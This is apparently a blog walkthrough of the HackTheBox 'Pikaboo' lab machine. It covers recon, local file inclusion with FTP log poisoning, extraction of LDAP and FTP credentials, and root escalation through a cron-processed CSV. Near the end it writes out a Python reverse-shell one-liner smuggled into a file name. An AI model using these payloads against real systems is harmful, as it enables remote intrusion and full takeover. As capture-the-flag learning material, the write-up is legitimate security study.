In this post, I would like to share a walkthrough of the Pikaboo Machine from HackTheBox


This room has been considered difficulty rated as a Hard machine

Source: HackTheBox

What will you gain from the Pikaboo machine?


For user flag, you will need to locate a Local File Inclusion vulnerability on the website here you will get user privileges to access via FTP


As for the root flag, you will need to dig deeper within the machine especially LDAP service where you will get a username and password for FTP access

Information Gathering


Once we have started the VPN connection which requires to download from Hackthebox, we can start the information gathering on the machine by executing the command nmap -sC -sV -p- <IP Address> -PN 


As a result, we must whitelist the domain name for the machine “pikaboo.htb” 


Let’s open the browser and straight into the website interface.


Surprisingly, there is nothing that is found on the website


From the server-status web interface, we notice there are a few directories that we investigate it.


Finally, we can easily access the directory of /admin../admin_staging as it directs us to a Dashboard


By looking at the website URL, I’m fairly sure that the website has a Local File Inclusion


After I must roam the directory on the website, I managed to find /var/log/vsfptd.log. We managed to see an FTP log on that file.

Gaining Privileges Access


As a result, an NC listener should be running on our terminal to get the reverse shell connection back to us.


We can use the PHP reverse shell which I have done a cheat sheet here


We need to run FTP pikaboo.htb on the terminal which we should insert a PHP execution of shell as our username.


The reverse shell connection requires us to refresh the /var/log/vsfptd.log


Voila! We managed to get the reverse shell connection back to us when we investigate the NC listener terminal


We can clarify which user that we managed to access the machine.


For us to read the user flag by executing the “cat user.txt” command

Escalate to Root Privileges Access


Sadly, we didn’t manage to retrieve any information on SUID from the “sudo -l” command


From my experience, we can investigate crontab to see any latest command that has been running especially with Root Privileges Access.


When I have fully analyzed the crontab file, I notice that /usr/local/bin/csvupdate_cron have been running as root privileges access


While we analyze the content of the csvupdate_cron file, we notice we can abuse the CSV file format.


While roaming inside the server, I notice there’s a configuration file (/opt/pokeapi/config/settings.php) that looks like something shown above


We have managed to get the LDAP password on the file, and it might lead to FTP credentials by running the following command

ldapsearch -x -LLL -h 127.0.0.1 -D 'cn=binduser,ou=users,dc=pikaboo,dc=htb' -w J~42%W?PFHl]g -b 'dc=ftp,dc=pikaboo,dc=htb' -s sub '(objectClass=*)'

As a result, the output that appears from the command above which you will see a base64 password. As a result, we need to decrypt the base64 password


The credentials that have been decrypted can be seen as below:

Username: pwnmeow
Password: _G0tT4_C4tcH'3m_4lL!_

We should be creating a file with the content as below:

touch pikaboo "|python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("\"IP ADDRESS\",PORT));[os.dup2(s.fileno(),f)for\ f\ in(0,1,2)];pty.spawn(""\"sh\")'; .csv"

We need to access the machine via FTP service by using the credentials that we found earlier


At last, we successfully logged into the machine via FTP, we should change to any subdirectory on the FTP service


Finally, we need to insert the reverse shellcode as following:

put  pikaboo "|python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("\"IP ADDRESS\",PORT));[os.dup2(s.fileno(),f)for\ f\ in(0,1,2)];pty.spawn(""\"sh\")'; .csv"

### We need to start our NC listener before running the command above ###


Based on crontab configuration, it will take around 1 minute to get a reverse shell connection back to us


We successfully access as Root Privileges


We can read the root flag by executing the command “cat root.txt” and submit the flag into Hackthebox website


-THE END-


Happy Learning Guys!

Extra Information


We can go to /etc/shadow to unlock the write-up